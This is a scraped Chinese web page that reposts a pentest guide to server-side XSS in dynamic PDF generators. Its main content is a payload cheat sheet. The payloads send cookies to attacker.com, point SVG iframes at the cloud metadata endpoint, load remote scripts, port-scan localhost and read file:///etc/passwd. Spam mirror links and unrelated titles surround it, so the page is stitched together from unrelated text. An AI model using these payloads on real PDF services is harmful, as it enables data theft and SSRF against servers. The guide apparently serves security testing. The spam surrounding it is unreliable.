当前位置: 首页 > news >正文 网站用自己的电脑做服务器网页设计期末作业源码 news 2025/10/25 3:51:42 网站用自己的电脑做服务器,网页设计期末作业源码,响应式网页,网站开发与设计的实训报告【Web漏洞指南】服务器端 XSS#xff08;动态 PDF#xff09; 概述流行的 PDF 生成工具常见攻击载荷 概述 如果一个网页使用用户控制的输入创建 PDF#xff0c;您可以尝试欺骗创建 PDF 的机器人以执行任意的 JS 代码。 因此#xff0c;如果PDF 创建机器人发现某种HTML标签… 【Web漏洞指南】服务器端 XSS动态 PDF 概述流行的 PDF 生成工具常见攻击载荷 概述 如果一个网页使用用户控制的输入创建 PDF您可以尝试欺骗创建 PDF 的机器人以执行任意的 JS 代码。 因此如果PDF 创建机器人发现某种HTML标签并且解释它们您可以滥用这种行为来引起服务器 XSS。 在常规利用中能够查看/下载创建的 PDF因此您将能够查看您通过 JS 编写的所有内容例如使用 document.write()。但是如果您无法看到创建的 PDF可能需要通过向您发出网络请求来提取信息盲人测试 流行的 PDF 生成工具 wkhtmltopdf 以其将 HTML 和 CSS 转换为 PDF 文档的能力而闻名TCPDF 在 PHP 生态系统中提供了一个强大的 PDF 生成解决方案对于在 Node.js 环境中工作的人PDFKit 提供了一个可行的选择。它使得可以直接从 HTML 和 CSS 生成 PDF 文档Java 开发人员可能更喜欢 iText这是一个库不仅有助于 PDF 创建还支持高级功能如数字签名和表单填充FPDF 是另一个 PHP 库以其简单性和易用性而著称 常见攻击载荷 1、测试XSS !-- 基本测试 -- img srcx onerrordocument.write(test) / scriptdocument.write(JSON.stringify(window.location))/script scriptdocument.write(iframe srcwindow.location.href/iframe)/script!-- 盲测 -- img srchttp://attacker.com/ img srcx onerrorlocation.hrefhttp://attacker.com/?c document.cookie scriptnew Image().srchttp://attacker.com/?cencodeURI(document.cookie);/script link relattachment hrefhttp://attacker.com2、SVG payload 一个访问Burpcollab子域的iframe和另一个访问元数据端点的iframe svg xmlns:xlinkhttp://www.w3.org/1999/xlink version1.1 classroot width800 height500 g foreignObject width800 height500 body xmlnshttp://www.w3.org/1999/xhtml iframe srchttp://redacted.burpcollaborator.net width800 height500/iframe iframe srchttp://169.254.169.254/latest/meta-data/ width800 height500/iframe /body /foreignObject /g /svgsvg width100% height100% viewBox0 0 100 100 xmlnshttp://www.w3.org/2000/svg circle cx50 cy50 r45 fill idfoo/ script typetext/javascript // ![CDATA[ alert(1); // ]] /script /svg更多SVG负载 https://github.com/allanlw/svg-cheatsheet 3、路径泄露 img srcx onerrordocument.write(window.location) / script document.write(window.location) /script4、加载外部脚本 利用这个漏洞的最佳方法是滥用漏洞使机器人加载您本地控制的脚本。然后您将能够在本地更改有效负载并使机器人每次都使用相同的代码加载它。 script srchttp://attacker.com/myscripts.js/script img srcxasdasdasd οnerrοrdocument.write(script srchttps://attacker.com/test.js/script)/5、机器人延迟 让机器人每 500 毫秒发送一次 ping 来检查机器人等待了多长时间 script let time 500; setInterval((){ let img document.createElement(img); img.src https://attacker.com/ping?time${time}ms; time 500; }, 500); /script img srchttps://attacker.com/delay6、端口扫描 script const checkPort (port) { fetch(http://localhost:${port}, { mode: no-cors }).then(() { let img document.createElement(img); img.src http://attacker.com/ping?port${port}; }); }for(let i0; i1000; i) { checkPort(i); } /script img srchttps://attacker.com/startingScan7、读取本地文件 / SSRF script xnew XMLHttpRequest; x.onloadfunction(){document.write(btoa(this.responseText))}; x.open(GET,file:///etc/passwd);x.send(); /scriptscript xhzeem new XMLHttpRequest(); xhzeem.onload function(){document.write(this.responseText);} xhzeem.onerror function(){document.write(failed!)} xhzeem.open(GET,file:///etc/passwd); xhzeem.send(); /scriptiframe srcfile:///etc/passwd/iframe img srcxasdasdasd onerrordocument.write(iframe srcfile:///etc/passwd/iframe)/ link relattachment hreffile:///root/secret.txt object datafile:///etc/passwd portal srcfile:///etc/passwd idportal embed srcfile:///etc/passwd width400 height400 styleiframe srcfile:///etc/passwd img srcx onerrordocument.write(iframe srcfile:///etc/passwd/iframe)/textwidth500height500 meta http-equivrefresh content0;urlfile:///etc/passwd /annotation file/etc/passwd content/etc/passwd iconGraph titleAttached File: /etc/passwd pos-x195 / 文章转载自: http://www.morning.mdlqf.cn.gov.cn.mdlqf.cn http://www.morning.kwqcy.cn.gov.cn.kwqcy.cn http://www.morning.azxey.cn.gov.cn.azxey.cn http://www.morning.rqqkc.cn.gov.cn.rqqkc.cn http://www.morning.qgbfx.cn.gov.cn.qgbfx.cn http://www.morning.dmzzt.cn.gov.cn.dmzzt.cn http://www.morning.cfocyfa.cn.gov.cn.cfocyfa.cn http://www.morning.nbqwt.cn.gov.cn.nbqwt.cn http://www.morning.mzzqs.cn.gov.cn.mzzqs.cn http://www.morning.rgnq.cn.gov.cn.rgnq.cn http://www.morning.yllym.cn.gov.cn.yllym.cn http://www.morning.ppzgr.cn.gov.cn.ppzgr.cn http://www.morning.bydpr.cn.gov.cn.bydpr.cn http://www.morning.gxqpm.cn.gov.cn.gxqpm.cn http://www.morning.tkjh.cn.gov.cn.tkjh.cn http://www.morning.jmnfh.cn.gov.cn.jmnfh.cn http://www.morning.tqdlk.cn.gov.cn.tqdlk.cn http://www.morning.ghwtn.cn.gov.cn.ghwtn.cn http://www.morning.clyhq.cn.gov.cn.clyhq.cn http://www.morning.grxsc.cn.gov.cn.grxsc.cn http://www.morning.nxwk.cn.gov.cn.nxwk.cn http://www.morning.wrtpk.cn.gov.cn.wrtpk.cn http://www.morning.mqss.cn.gov.cn.mqss.cn http://www.morning.fqyqm.cn.gov.cn.fqyqm.cn http://www.morning.pkrb.cn.gov.cn.pkrb.cn http://www.morning.qtwd.cn.gov.cn.qtwd.cn http://www.morning.qrwnj.cn.gov.cn.qrwnj.cn http://www.morning.trjp.cn.gov.cn.trjp.cn http://www.morning.niukaji.com.gov.cn.niukaji.com http://www.morning.gpsr.cn.gov.cn.gpsr.cn http://www.morning.hdzty.cn.gov.cn.hdzty.cn http://www.morning.rtlg.cn.gov.cn.rtlg.cn http://www.morning.gxfpk.cn.gov.cn.gxfpk.cn http://www.morning.jfxth.cn.gov.cn.jfxth.cn http://www.morning.rghkg.cn.gov.cn.rghkg.cn http://www.morning.ysgnb.cn.gov.cn.ysgnb.cn http://www.morning.kmprl.cn.gov.cn.kmprl.cn http://www.morning.zckhn.cn.gov.cn.zckhn.cn http://www.morning.rrwft.cn.gov.cn.rrwft.cn http://www.morning.ypcd.cn.gov.cn.ypcd.cn http://www.morning.skqfx.cn.gov.cn.skqfx.cn http://www.morning.lekbiao.com.gov.cn.lekbiao.com http://www.morning.zphlb.cn.gov.cn.zphlb.cn http://www.morning.rlxg.cn.gov.cn.rlxg.cn http://www.morning.bsghk.cn.gov.cn.bsghk.cn http://www.morning.zkdmk.cn.gov.cn.zkdmk.cn http://www.morning.bkfdf.cn.gov.cn.bkfdf.cn http://www.morning.rbkl.cn.gov.cn.rbkl.cn http://www.morning.xdfkrd.cn.gov.cn.xdfkrd.cn http://www.morning.rqsnl.cn.gov.cn.rqsnl.cn http://www.morning.sgbsr.cn.gov.cn.sgbsr.cn http://www.morning.yjmlg.cn.gov.cn.yjmlg.cn http://www.morning.tmnyj.cn.gov.cn.tmnyj.cn http://www.morning.lokext.com.gov.cn.lokext.com http://www.morning.lsjgh.cn.gov.cn.lsjgh.cn http://www.morning.nfzzf.cn.gov.cn.nfzzf.cn http://www.morning.qyfrd.cn.gov.cn.qyfrd.cn http://www.morning.rqhbt.cn.gov.cn.rqhbt.cn http://www.morning.jncxr.cn.gov.cn.jncxr.cn http://www.morning.ktcrr.cn.gov.cn.ktcrr.cn http://www.morning.cnqwn.cn.gov.cn.cnqwn.cn http://www.morning.nggbf.cn.gov.cn.nggbf.cn http://www.morning.wlqbr.cn.gov.cn.wlqbr.cn http://www.morning.ghxkm.cn.gov.cn.ghxkm.cn http://www.morning.yzsdp.cn.gov.cn.yzsdp.cn http://www.morning.qrpx.cn.gov.cn.qrpx.cn http://www.morning.rhph.cn.gov.cn.rhph.cn http://www.morning.fbrshjf.com.gov.cn.fbrshjf.com http://www.morning.jrksk.cn.gov.cn.jrksk.cn http://www.morning.pjfmq.cn.gov.cn.pjfmq.cn http://www.morning.yzfrh.cn.gov.cn.yzfrh.cn http://www.morning.wprxm.cn.gov.cn.wprxm.cn http://www.morning.xtrnx.cn.gov.cn.xtrnx.cn http://www.morning.ptwrz.cn.gov.cn.ptwrz.cn http://www.morning.qnypp.cn.gov.cn.qnypp.cn http://www.morning.hgbzc.cn.gov.cn.hgbzc.cn http://www.morning.ntqlz.cn.gov.cn.ntqlz.cn http://www.morning.mzqhb.cn.gov.cn.mzqhb.cn http://www.morning.kjkml.cn.gov.cn.kjkml.cn http://www.morning.xkjqg.cn.gov.cn.xkjqg.cn 查看全文 http://www.tj-hxxt.cn/news/247143.html 相关文章: 小企业网站模板礼泉做网站 新闻类的网站如何做优化、网站如何从后台进入 360网站建设怎么用长沙做官方网站 源码站昆山app网站制作 网站建设服务合约网站流量下滑 酒泉哪家公司可以做网站怎样优古网络公司网站后台 校园网站建设的开题报告私域电商平台 四川成都高端网站建设wordpress 漏斗式搜索插件 如何自己做软件网站一级a做爰网站 南宁网站seo外包品牌推广三元论 校园网站建设的重要性如何进入wordpress后台 机械设备企业网站源码主机 可以 多少 网站 网站标题一样国际机票搜索量大涨 网站软件资源本地环境建设网站 房地网站制作企业运营是做什么的 网站开发和程序开发网站建设 外包是什么意思 聊城做网站公司聊城博达部门网站的开发 意义 网站没有备案号店铺设计思路怎么写 郑州搭建网站深圳市建设工程有限公司 网站建设推广怎样找客户网络营销与直播电商是干什么的 asp.net网站发布到虚拟主机网站搭建需要多少钱 电子商务网站开发的课程介绍做宣传类网站需要什么资质 扬州整站seo网站做淘宝客有什么要求 网站开发完成情况说明宁夏建设工程招标投标信息网站 调查网站做调查不容易过网站关键词怎样修改 建设机械网站精英推广赚钱的微信小程序 用vuejs做的网站丰县徐州网站开发 福建众利建设工程网站有赞微商城登录入口 哈尔滨网站开发制作wordpress 主题分享 怎样建设传奇网站空间泰兴网站建设公司
